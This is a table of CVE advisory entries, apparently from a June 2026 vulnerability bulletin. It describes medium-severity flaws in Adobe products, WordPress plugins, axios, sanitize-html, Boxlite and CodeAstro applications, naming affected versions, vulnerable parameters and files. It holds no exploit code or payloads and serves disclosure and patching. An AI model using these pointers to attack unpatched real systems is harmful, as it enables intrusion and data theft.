| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47957 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47958 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47962 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47966 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47970 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47972 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47973 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47974 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47975 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47977 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47978 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47980 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47981 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47982 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47983 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47985 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47986 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47987 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47989 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47990 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47993 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48250 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48251 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48256 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48258 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48264 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48265 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48266 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48268 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48271 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48280 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48297 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48299 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48300 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48301 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48304 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by an Improper Redirect (Open Redirect) vulnerability that could lead to account takeover. An attacker could construct a malicious URL that redirects a victim to an attacker-controlled site. Exploitation of this issue requires user interaction in that a victim must click on a malicious link. | 2026-06-09 | 4.3 | CVE-2026-47991 |
| Adobe--Adobe Experience Manager Forms JEE | Adobe Experience Manager Forms JEE versions LTS SP1, 6.5.24.0 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.9 | CVE-2026-34694 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Uncontrolled Resource Consumption vulnerability. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 6.2 | CVE-2026-47902 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Improper Input Validation vulnerability. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 6.2 | CVE-2026-47903 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Uncontrolled Resource Consumption vulnerability. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 6.2 | CVE-2026-47904 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Uncontrolled Resource Consumption vulnerability. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 6.2 | CVE-2026-47905 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in an arbitrary file system write. An attacker could leverage this vulnerability to write to unauthorized files or directories outside of intended restrictions. Exploitation of this issue requires user interaction in that a victim must extract a maliciously crafted file. | 2026-06-09 | 5.5 | CVE-2026-34657 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 4.8 | CVE-2026-47933 |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.7 and earlier are affected by an Improper Input Validation vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 6.3 | CVE-2026-47909 |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.7 and earlier are affected by an Incorrect Authorization vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 6.3 | CVE-2026-47910 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-34703 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-34704 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-34705 |
| AMD--AMD EPYC 7003 Series Processors | Improper input validation for DIMM serial presence detect (SPD) metadata could allow an attacker with physical access, ring0 access on a system with a non-compliant DIMM, or control over the Root of Trust for BIOS update, to potentially overwrite guest memory resulting in loss of guest data integrity. | 2026-06-10 | 5.3 | CVE-2024-21944 |
| andrewabarber--Extra Settings for RocketChat | The Extra Settings for RocketChat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rocketchat' shortcode's 'title' attribute in versions up to, and including, 0.1. This is due to insufficient input sanitization and output escaping in the rxstg_shortcode() function, which concatenates the user-supplied 'title' attribute directly into HTML output. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-8841 |
| apostrophecms--@apostrophecms/cli | ApostropheCMS is an open-source Node.js content management system. Versions of the @apostrophecms/cli package up to and including 3.6.0 contain a command injection vulnerability in the apos create command. User-supplied input from the password prompt is embedded directly into a shell command without proper sanitization or escaping. This allows execution of arbitrary commands on the host system. As of time of publication, no known patched versions are available. | 2026-06-12 | 6.5 | CVE-2026-42853 |
| apostrophecms--sanitize-html | ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. Versions of sanitize-html prior to 2.17.5 use `allowedSchemesAppliedToAttributes` (default: `['href', 'src', 'cite']`) to gate the `naughtyHref()` function that blocks dangerous URI schemes like `javascript:` and `vbscript:`. The HTML specification defines 10+ attributes that accept URIs (`action`, `formaction`, `data`, `poster`, `background`, `ping`, `xlink:href`, `dynsrc`, `lowsrc`), but none of these are included in the default gate list. When a developer allows any of these attributes in their configuration, `javascript:` URIs pass through completely unmodified, enabling XSS. Version 2.17.5 patches the issue. | 2026-06-12 | 5.4 | CVE-2026-53606 |
| Aqara--Aqara IAM/SSO Gateway | The Aqara IAM/SSO Gateway (gw-builder.aqara.com) provides an open redirect, which is an instance of "CWE-601: URL Redirection to Untrusted Site," with an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (6.1 Medium), which can be used to set up a phishing attack. | 2026-06-12 | 6.1 | CVE-2026-50089 |
| Aqara--Cloud Developer Portal | The Aqara Cloud Developer Portal (developer.aqara.com) issued a developer token to any email address supplied by the attacker. This is an instance of "CWE-306: Missing Authentication for Critical Function" with an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N (6.5 Medium). When combined with CVE-2026-50083, CVE-2026-50084, and CVE-2026-50085, any otherwise-unauthenticated attacker could execute a full takeover of affected devices. | 2026-06-12 | 6.5 | CVE-2026-50082 |
| aurelienlws--LWS Optimize All-in-One Speed Booster & Cache Tools | The LWS Optimize - All-in-One Speed Booster & Cache Tools plugin for WordPress is vulnerable to Arbitrary File Read in versions up to, and including, 3.3.19. This is due to the combine_current_css() function trusting <link rel="stylesheet" href="..."> values harvested from page HTML and converting same-site URLs to absolute filesystem paths before reading them with file_get_contents()/Minify\CSS::add(), without enforcing that the resolved path stay within ABSPATH or have a .css extension. This makes it possible for authenticated attackers, with Editor-level access and above, to read arbitrary files. | 2026-06-13 | 4.9 | CVE-2026-12089 |
| AWS--s2n-quic | Unbounded memory allocation in the CRYPTO frame reassembler in s2n-quic before 1.8.2 may allow an unauthenticated remote actor to cause a denial of service (degraded availability) by sending crafted QUIC Initial packets. To remediate this issue, users should upgrade to v1.8.2. | 2026-06-10 | 5.3 | CVE-2026-10740 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, axios exposes two read-side prototype-pollution gadgets. When Object.prototype is polluted by an upstream dependency in the same process (e.g. lodash _.merge / CVE-2018-16487), axios silently picks up the polluted values. (1) lib/utils.js line 406 builds merge()'s accumulator as result = {}, so result[targetKey] (line 414) walks Object.prototype and the polluted bucket's own keys are copied into the merged headers and ride out on the wire. (2) lib/core/mergeConfig.js line 26 builds the hasOwnProperty descriptor as a plain-object literal. Object.defineProperty reads descriptor.get/descriptor.set via the prototype chain, so a polluted Object.prototype.get or Object.prototype.set makes the call throw TypeError synchronously on every axios request. This vulnerability is fixed in 0.32.0 and 1.16.0. | 2026-06-11 | 4.8 | CVE-2026-44490 |
| BeRocket--Advanced AJAX Product Filters | Missing Authorization vulnerability in BeRocket Advanced AJAX Product Filters allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Advanced AJAX Product Filters: from n/a through 1.6.3.3. | 2026-06-11 | 5.4 | CVE-2022-45813 |
| boxlite-ai--boxlite | Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code. In versions 0.8.2 and prior, Boxlite allows users to configure a timeout for services running inside the virtual machine. When the timeout is triggered, Boxlite sends a signal to kill the process. However, instead of using the uncatchable SIGKILL signal, Boxlite uses the catchable SIGALRM signal. Malicious code running inside the sandbox can exploit this vulnerability to continue running after the timeout is triggered, leading to resource exhaustion within the virtual machine and affecting the availability of the Boxlite service. This issue has been patched via commit 28159fc. | 2026-06-10 | 6.5 | CVE-2026-47213 |
| bplugins--Easy Twitter Feeds | Easy Twitter Feeds before 1.2.13 contains a cross-site request forgery vulnerability in the duplicate_post action handler that lacks nonce verification. Attackers can trick an authenticated user into visiting a crafted link that duplicates any post regardless of post type. | 2026-06-10 | 4.3 | CVE-2026-53736 |
| brechtvds--Easy Image Collage | The Easy Image Collage plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'grid[properties][borderColor]' and 'grid[images][N][attachment_url]' Parameters in all versions up to, and including, 1.13.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Because the data is stored via update_post_meta() rather than wp_insert_post() post content, WordPress's unfiltered_html restriction does not apply, meaning Authors cannot be blocked from this attack path by capability controls alone. | 2026-06-10 | 6.4 | CVE-2026-9019 |
| brian-ruf--OSCAL-GUI | OSCAL-GUI contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious input through the project request parameter. Attackers can craft a malicious URL containing unsanitized input that breaks out of the JavaScript string and HTML attribute context in the body onload event handler to execute arbitrary scripts when the link is visited by a victim. | 2026-06-09 | 6.1 | CVE-2026-34416 |
| brian-ruf--OSCAL-GUI | OSCAL-GUI contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious content through the project request parameter in oscal-forms.php. The parameter value is URL-decoded and assigned to the project_id variable without sanitization in oscal-functions.php, and when the supplied project ID is not found, the unsanitized value is concatenated into an error message via the Messages() function and reflected into the HTML response body without encoding. | 2026-06-09 | 6.1 | CVE-2026-34417 |
| brooks24--admin-word-count-column | WordPress Plugin admin-word-count-column 2.2 contains a local file read vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting null byte injection in the path parameter. Attackers can send GET requests to download-csv.php with a crafted path parameter containing directory traversal sequences and null bytes to bypass file restrictions and read sensitive files like system configuration. | 2026-06-08 | 6.2 | CVE-2022-50953 |
| brthumar1959--Product Filter Widget for Elementor | The Product Filter Widget for Elementor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'args[filterFormArray]' Parameter in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The endpoint is registered via wp_ajax_nopriv_ with no nonce verification or capability check, and exploitation is delivered via a CSRF-style form auto-submission to the admin-ajax.php endpoint, requiring the attacker to trick a victim into visiting an attacker-controlled page. | 2026-06-09 | 6.1 | CVE-2026-11603 |
| BuddyPress--BuddyPress | BuddyPress 14.4.0 contains an insecure direct object reference vulnerability in the friends REST API that allows any authenticated attacker to enumerate another user's complete friend list. Attackers can query the friends endpoint with an arbitrary user_id because the get_items_permissions_check method only verifies that the requester is logged in and never checks ownership of the requested list, resulting in disclosure of users' private social connections. | 2026-06-09 | 4.3 | CVE-2026-53675 |
| Cap-go--capgo | Cap-go Console < 12.28.2 contains a denial-of-service vulnerability in its account deletion flow that allows an attacker to block authentication and onboarding functions by triggering account deletion while a device identifier is linked to the active session. The platform incorrectly associates the deletion state with the device identifier, causing the affected device or browser environment to be redirected to an account-disabled page for approximately 30 days, preventing any account login or registration from that device. | 2026-06-12 | 6.5 | CVE-2026-53982 |
| Cap-go--capgo | Capgo before 12.128.2 fails to delete previously uploaded profile images from backend storage when users replace or remove them. Attackers can access orphaned image files through previously generated URLs, allowing unauthorized retrieval of user-uploaded content. | 2026-06-12 | 4.3 | CVE-2026-53867 |
| Chengdu Everbrite Network Technology--BeikeShop | A vulnerability was found in Chengdu Everbrite Network Technology BeikeShop up to 1.6.0.22. Impacted is an unknown function of the file beike/Admin/Routes/admin.php of the component Admin Design Builder Endpoint. Performing a manipulation of the argument settings.value results in sql injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The patch is named 2fa9805411088069fcc3b0c15b2f1f33d6e09958. To fix this issue, it is recommended to deploy a patch. | 2026-06-08 | 6.3 | CVE-2026-11480 |
| code16--sharp | Sharp is a content management framework built for Laravel as a package. From version 9.0.0 to before version 9.22.3, the create and store endpoints of the Quick Creation Command feature did not enforce any authorization check. An authenticated Sharp user without create permission on a given entity could bypass the authorization layer and either retrieve the creation form or submit new records for that entity, as long as it had a Quick Creation Command handler configured. This issue has been patched in version 9.22.3. | 2026-06-10 | 4.3 | CVE-2026-53634 |
| CodeAstro--Human Resource Management System | A weakness has been identified in CodeAstro Human Resource Management System 1.0. This vulnerability affects the function Invoice of the file \application\controllers\Payroll.php of the component Payroll Invoice Module. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. | 2026-06-12 | 6.3 | CVE-2026-12131 |
| CodeAstro--Ingredients Stock Management System | A vulnerability was detected in CodeAstro Ingredients Stock Management System 1.0. This impacts an unknown function of the file /Ingredients-Stock/add_stock.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit is now public and may be used. | 2026-06-08 | 6.3 | CVE-2026-11495 |
| CodeAstro--Leave Management System | A vulnerability has been found in CodeAstro Leave Management System 1.0. This impacts an unknown function of the file /admin/search_staff_for_deletion.php. The manipulation of the argument Name leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2026-06-08 | 6.3 | CVE-2026-11506 |
| CodeAstro--Leave Management System | A vulnerability was found in CodeAstro Leave Management System 1.0. Affected is an unknown function of the file /admin/delete_leave_type.php. The manipulation of the argument leave_type results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-06-08 | 6.3 | CVE-2026-11507 |
| CodeAstro--Leave Management System | A vulnerability was determined in CodeAstro Leave Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/search_staff_to_assign_pc.php. This manipulation of the argument Name causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-08 | 6.3 | CVE-2026-11508 |
| CodeAstro--Leave Management System | A vulnerability was identified in CodeAstro Leave Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/search_staff_for_updation.php. Such manipulation of the argument Name leads to sql injection. The attack may be performed from remote. | 2026-06-08 | 6.3 | CVE-2026-11509 |
| CodeAstro--Leave Management System | A security flaw has been discovered in CodeAstro Leave Management System 1.0. This affects an unknown part of the file /admin/add_leave.php. Performing a manipulation of the argument type_of_leave results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-08 | 6.3 | CVE-2026-11510 |
